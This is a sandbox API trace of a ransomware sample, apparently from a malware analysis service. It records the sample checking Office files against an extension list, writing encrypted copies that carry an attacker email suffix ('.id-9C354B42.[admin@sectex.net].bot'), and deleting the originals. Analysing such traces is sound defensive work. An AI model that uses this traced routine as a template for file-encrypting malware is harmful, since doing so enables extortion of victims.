	[0155.915] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0155.915] lstrlenW (lpString=".xlsx") returned 5
	[0155.915] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1
	[0155.915] lstrlenW (lpString=".ppt") returned 4
	[0155.915] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0155.915] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\ColleagueImport.dll") returned 69
	[0155.915] lstrlenW (lpString=".zip") returned 4
	[0155.915] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0155.915] lstrlenW (lpString=".rar") returned 4
	[0155.915] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0155.915] lstrlenW (lpString=".bz2") returned 4
	[0155.915] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0155.915] lstrlenW (lpString=".7z") returned 3
	[0155.915] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0155.915] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\ColleagueImport.dll") returned 69
	[0155.915] lstrlenW (lpString=".dbf") returned 4
	[0155.915] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0155.915] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\ColleagueImport.dll") returned 69
	[0155.915] lstrlenW (lpString=".1cd") returned 4
	[0155.915] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0155.915] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\ColleagueImport.dll") returned 69
	[0155.915] lstrlenW (lpString=".jpg") returned 4
	[0155.915] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0155.915] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\ColleagueImport.dll") returned 69
	[0155.915] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\ColleagueImport.dll") returned 69
	[0155.915] lstrlenW (lpString=".doc") returned 4
	[0155.915] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0155.915] lstrlenW (lpString=".docx") returned 5
	[0155.915] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1
	[0155.916] lstrlenW (lpString=".pdf") returned 4
	[0155.916] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0155.916] lstrlenW (lpString=".xls") returned 4
	[0155.916] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0155.916] lstrlenW (lpString=".xlsx") returned 5
	[0155.916] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1
	[0155.916] lstrlenW (lpString=".ppt") returned 4
	[0155.916] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0155.916] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\ColleagueImport.dll") returned 69
	[0155.916] lstrlenW (lpString=".zip") returned 4
	[0155.916] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0155.916] lstrlenW (lpString=".rar") returned 4
	[0155.916] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0155.916] lstrlenW (lpString=".bz2") returned 4
	[0155.916] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0155.916] lstrlenW (lpString=".7z") returned 3
	[0155.916] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0155.916] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\ColleagueImport.dll") returned 69
	[0155.916] lstrlenW (lpString=".dbf") returned 4
	[0155.916] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0155.916] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\ColleagueImport.dll") returned 69
	[0155.916] lstrlenW (lpString=".1cd") returned 4
	[0155.916] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0155.916] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\ColleagueImport.dll") returned 69
	[0155.916] lstrlenW (lpString=".jpg") returned 4
	[0155.916] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0155.916] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0155.916] lstrlenW (lpString="MSOSEC.DLL") returned 10
	[0155.917] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\MSOSEC.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\msosec.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0155.917] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=7168) returned 1
	[0155.917] CloseHandle (hObject=0x3b0) returned 1
	[0155.917] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\MSOSEC.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\msosec.dll")) returned 0x20
	[0155.917] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\MSOSEC.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\msosec.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0155.917] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\MSOSEC.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\msosec.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0155.917] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\MSOSEC.DLL") returned 60
	[0155.917] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\MSOSEC.DLL") returned 60
	[0155.918] lstrlenW (lpString=".doc") returned 4
	[0155.918] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0155.918] lstrlenW (lpString=".docx") returned 5
	[0155.918] lstrcmpiW (lpString1=".docx", lpString2="C.DLL") returned -1
	[0155.918] lstrlenW (lpString=".pdf") returned 4
	[0155.918] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0155.918] lstrlenW (lpString=".xls") returned 4
	[0155.918] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0155.918] lstrlenW (lpString=".xlsx") returned 5
	[0155.918] lstrcmpiW (lpString1=".xlsx", lpString2="C.DLL") returned -1
	[0155.918] lstrlenW (lpString=".ppt") returned 4
	[0155.918] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0155.918] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\MSOSEC.DLL") returned 60
	[0155.918] lstrlenW (lpString=".zip") returned 4
	[0155.918] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0155.918] lstrlenW (lpString=".rar") returned 4
	[0155.918] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0155.918] lstrlenW (lpString=".bz2") returned 4
	[0155.918] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0155.918] lstrlenW (lpString=".7z") returned 3
	[0155.918] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0155.918] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\MSOSEC.DLL") returned 60
	[0155.918] lstrlenW (lpString=".dbf") returned 4
	[0155.918] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0155.918] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\MSOSEC.DLL") returned 60
	[0155.918] lstrlenW (lpString=".1cd") returned 4
	[0155.918] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0155.918] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\MSOSEC.DLL") returned 60
	[0155.918] lstrlenW (lpString=".jpg") returned 4
	[0155.918] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0155.919] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\MSOSEC.DLL") returned 60
	[0155.919] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\MSOSEC.DLL") returned 60
	[0155.919] lstrlenW (lpString=".doc") returned 4
	[0155.919] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0155.919] lstrlenW (lpString=".docx") returned 5
	[0155.919] lstrcmpiW (lpString1=".docx", lpString2="C.DLL") returned -1
	[0155.919] lstrlenW (lpString=".pdf") returned 4
	[0155.919] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0155.919] lstrlenW (lpString=".xls") returned 4
	[0155.919] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0155.919] lstrlenW (lpString=".xlsx") returned 5
	[0155.919] lstrcmpiW (lpString1=".xlsx", lpString2="C.DLL") returned -1
	[0155.919] lstrlenW (lpString=".ppt") returned 4
	[0155.919] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0155.919] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\MSOSEC.DLL") returned 60
	[0155.919] lstrlenW (lpString=".zip") returned 4
	[0155.919] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0155.919] lstrlenW (lpString=".rar") returned 4
	[0155.919] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0155.919] lstrlenW (lpString=".bz2") returned 4
	[0155.919] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0155.919] lstrlenW (lpString=".7z") returned 3
	[0155.919] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0155.919] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\MSOSEC.DLL") returned 60
	[0155.919] lstrlenW (lpString=".dbf") returned 4
	[0155.919] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0155.919] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\MSOSEC.DLL") returned 60
	[0155.919] lstrlenW (lpString=".1cd") returned 4
	[0155.919] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0155.919] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\MSOSEC.DLL") returned 60
	[0155.919] lstrlenW (lpString=".jpg") returned 4
	[0155.919] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0155.920] lstrcmpiW (lpString1=".ECF", lpString2=".bot") returned 1
	[0155.920] lstrlenW (lpString="MSSPC.ECF") returned 9
	[0155.920] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\MSSPC.ECF" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\msspc.ecf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0155.920] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=778) returned 1
	[0155.920] CloseHandle (hObject=0x3b0) returned 1
	[0155.920] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\MSSPC.ECF" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\msspc.ecf")) returned 0x20
	[0155.920] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\MSSPC.ECF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\msspc.ecf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0155.920] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\MSSPC.ECF" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\msspc.ecf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0155.921] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.921] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.921] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\MSSPC.ECF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\msspc.ecf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0155.952] GetLastError () returned 0x0
	[0155.952] ReadFile (in: hFile=0x3b0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x30a, lpOverlapped=0x0) returned 1
	[0156.039] WriteFile (in: hFile=0x3d0, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x310, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x310, lpOverlapped=0x0) returned 1
	[0156.039] ReadFile (in: hFile=0x3b0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0156.039] WriteFile (in: hFile=0x3d0, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0156.040] SetEndOfFile (hFile=0x3d0) returned 1
	[0156.040] CloseHandle (hObject=0x3d0) returned 1
	[0156.040] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.040] SetEndOfFile (hFile=0x3b0) returned 1
	[0156.042] CloseHandle (hObject=0x3b0) returned 1
	[0156.042] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\MSSPC.ECF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0156.042] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\MSSPC.ECF" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\msspc.ecf")) returned 1
	[0156.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\MSSPC.ECF") returned 59
	[0156.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\MSSPC.ECF") returned 59
	[0156.043] lstrlenW (lpString=".doc") returned 4
	[0156.043] lstrcmpiW (lpString1=".doc", lpString2=".ECF") returned -1
	[0156.043] lstrlenW (lpString=".docx") returned 5
	[0156.043] lstrcmpiW (lpString1=".docx", lpString2="C.ECF") returned -1
	[0156.043] lstrlenW (lpString=".pdf") returned 4
	[0156.043] lstrcmpiW (lpString1=".pdf", lpString2=".ECF") returned 1
	[0156.043] lstrlenW (lpString=".xls") returned 4
	[0156.043] lstrcmpiW (lpString1=".xls", lpString2=".ECF") returned 1
	[0156.043] lstrlenW (lpString=".xlsx") returned 5
	[0156.043] lstrcmpiW (lpString1=".xlsx", lpString2="C.ECF") returned -1
	[0156.043] lstrlenW (lpString=".ppt") returned 4
	[0156.043] lstrcmpiW (lpString1=".ppt", lpString2=".ECF") returned 1
	[0156.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\MSSPC.ECF") returned 59
	[0156.044] lstrlenW (lpString=".zip") returned 4
	[0156.044] lstrcmpiW (lpString1=".zip", lpString2=".ECF") returned 1
	[0156.044] lstrlenW (lpString=".rar") returned 4
	[0156.044] lstrcmpiW (lpString1=".rar", lpString2=".ECF") returned 1
	[0156.044] lstrlenW (lpString=".bz2") returned 4
	[0156.044] lstrcmpiW (lpString1=".bz2", lpString2=".ECF") returned -1
	[0156.044] lstrlenW (lpString=".7z") returned 3
	[0156.044] lstrcmpiW (lpString1=".7z", lpString2="ECF") returned -1
	[0156.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\MSSPC.ECF") returned 59
	[0156.044] lstrlenW (lpString=".dbf") returned 4
	[0156.044] lstrcmpiW (lpString1=".dbf", lpString2=".ECF") returned -1
	[0156.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\MSSPC.ECF") returned 59
	[0156.044] lstrlenW (lpString=".1cd") returned 4
	[0156.044] lstrcmpiW (lpString1=".1cd", lpString2=".ECF") returned -1
	[0156.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\MSSPC.ECF") returned 59
	[0156.044] lstrlenW (lpString=".jpg") returned 4
	[0156.044] lstrcmpiW (lpString1=".jpg", lpString2=".ECF") returned 1
	[0156.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\MSSPC.ECF") returned 59
	[0156.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\MSSPC.ECF") returned 59
	[0156.044] lstrlenW (lpString=".doc") returned 4
	[0156.044] lstrcmpiW (lpString1=".doc", lpString2=".ECF") returned -1
	[0156.044] lstrlenW (lpString=".docx") returned 5
	[0156.044] lstrcmpiW (lpString1=".docx", lpString2="C.ECF") returned -1
	[0156.044] lstrlenW (lpString=".pdf") returned 4
	[0156.044] lstrcmpiW (lpString1=".pdf", lpString2=".ECF") returned 1
	[0156.044] lstrlenW (lpString=".xls") returned 4
	[0156.044] lstrcmpiW (lpString1=".xls", lpString2=".ECF") returned 1
	[0156.044] lstrlenW (lpString=".xlsx") returned 5
	[0156.044] lstrcmpiW (lpString1=".xlsx", lpString2="C.ECF") returned -1
	[0156.044] lstrlenW (lpString=".ppt") returned 4
	[0156.044] lstrcmpiW (lpString1=".ppt", lpString2=".ECF") returned 1
	[0156.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\MSSPC.ECF") returned 59
	[0156.045] lstrlenW (lpString=".zip") returned 4
	[0156.045] lstrcmpiW (lpString1=".zip", lpString2=".ECF") returned 1
	[0156.045] lstrlenW (lpString=".rar") returned 4
	[0156.045] lstrcmpiW (lpString1=".rar", lpString2=".ECF") returned 1
	[0156.045] lstrlenW (lpString=".bz2") returned 4
	[0156.045] lstrcmpiW (lpString1=".bz2", lpString2=".ECF") returned -1
	[0156.045] lstrlenW (lpString=".7z") returned 3
	[0156.045] lstrcmpiW (lpString1=".7z", lpString2="ECF") returned -1
	[0156.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\MSSPC.ECF") returned 59
	[0156.045] lstrlenW (lpString=".dbf") returned 4
	[0156.045] lstrcmpiW (lpString1=".dbf", lpString2=".ECF") returned -1
	[0156.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\MSSPC.ECF") returned 59
	[0156.045] lstrlenW (lpString=".1cd") returned 4
	[0156.045] lstrcmpiW (lpString1=".1cd", lpString2=".ECF") returned -1
	[0156.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\MSSPC.ECF") returned 59
	[0156.045] lstrlenW (lpString=".jpg") returned 4
	[0156.045] lstrcmpiW (lpString1=".jpg", lpString2=".ECF") returned 1
	[0156.045] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0156.045] lstrlenW (lpString="AEC.DLL") returned 7
	[0156.045] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\AEC.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\aec.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0156.063] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=1571704) returned 1
	[0156.063] CloseHandle (hObject=0x3a0) returned 1
	[0156.063] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\AEC.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\aec.dll")) returned 0x20
	[0156.282] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\AEC.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\aec.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0156.317] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\AEC.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\aec.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0156.336] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AEC.DLL") returned 50
	[0156.336] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AEC.DLL") returned 50
	[0156.336] lstrlenW (lpString=".doc") returned 4
	[0156.336] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0156.336] lstrlenW (lpString=".docx") returned 5
	[0156.336] lstrcmpiW (lpString1=".docx", lpString2="C.DLL") returned -1
	[0156.336] lstrlenW (lpString=".pdf") returned 4
	[0156.336] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0156.336] lstrlenW (lpString=".xls") returned 4
	[0156.336] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0156.336] lstrlenW (lpString=".xlsx") returned 5
	[0156.337] lstrcmpiW (lpString1=".xlsx", lpString2="C.DLL") returned -1
	[0156.337] lstrlenW (lpString=".ppt") returned 4
	[0156.337] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0156.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AEC.DLL") returned 50
	[0156.337] lstrlenW (lpString=".zip") returned 4
	[0156.337] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0156.337] lstrlenW (lpString=".rar") returned 4
	[0156.337] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0156.337] lstrlenW (lpString=".bz2") returned 4
	[0156.337] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0156.337] lstrlenW (lpString=".7z") returned 3
	[0156.337] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0156.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AEC.DLL") returned 50
	[0156.337] lstrlenW (lpString=".dbf") returned 4
	[0156.337] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0156.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AEC.DLL") returned 50
	[0156.337] lstrlenW (lpString=".1cd") returned 4
	[0156.337] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0156.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AEC.DLL") returned 50
	[0156.337] lstrlenW (lpString=".jpg") returned 4
	[0156.337] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0156.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AEC.DLL") returned 50
	[0156.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AEC.DLL") returned 50
	[0156.338] lstrlenW (lpString=".doc") returned 4
	[0156.338] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0156.338] lstrlenW (lpString=".docx") returned 5
	[0156.338] lstrcmpiW (lpString1=".docx", lpString2="C.DLL") returned -1
	[0156.338] lstrlenW (lpString=".pdf") returned 4
	[0156.338] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0156.338] lstrlenW (lpString=".xls") returned 4
	[0156.338] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0156.338] lstrlenW (lpString=".xlsx") returned 5
	[0156.338] lstrcmpiW (lpString1=".xlsx", lpString2="C.DLL") returned -1
	[0156.338] lstrlenW (lpString=".ppt") returned 4
	[0156.338] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0156.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AEC.DLL") returned 50
	[0156.338] lstrlenW (lpString=".zip") returned 4
	[0156.338] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0156.338] lstrlenW (lpString=".rar") returned 4
	[0156.338] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0156.338] lstrlenW (lpString=".bz2") returned 4
	[0156.338] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0156.338] lstrlenW (lpString=".7z") returned 3
	[0156.338] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0156.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AEC.DLL") returned 50
	[0156.338] lstrlenW (lpString=".dbf") returned 4
	[0156.338] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0156.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AEC.DLL") returned 50
	[0156.338] lstrlenW (lpString=".1cd") returned 4
	[0156.338] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0156.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AEC.DLL") returned 50
	[0156.338] lstrlenW (lpString=".jpg") returned 4
	[0156.338] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0156.339] lstrcmpiW (lpString1=".BDR", lpString2=".bot") returned -1
	[0156.339] lstrlenW (lpString="MSART11.BDR") returned 11
	[0156.339] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART11.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart11.bdr"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0156.395] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=30920) returned 1
	[0156.395] CloseHandle (hObject=0x3dc) returned 1
	[0156.395] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART11.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart11.bdr")) returned 0x20
	[0156.395] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART11.BDR.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart11.bdr.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0156.395] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART11.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart11.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0156.395] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.410] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.410] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART11.BDR.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart11.bdr.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0156.411] GetLastError () returned 0x0
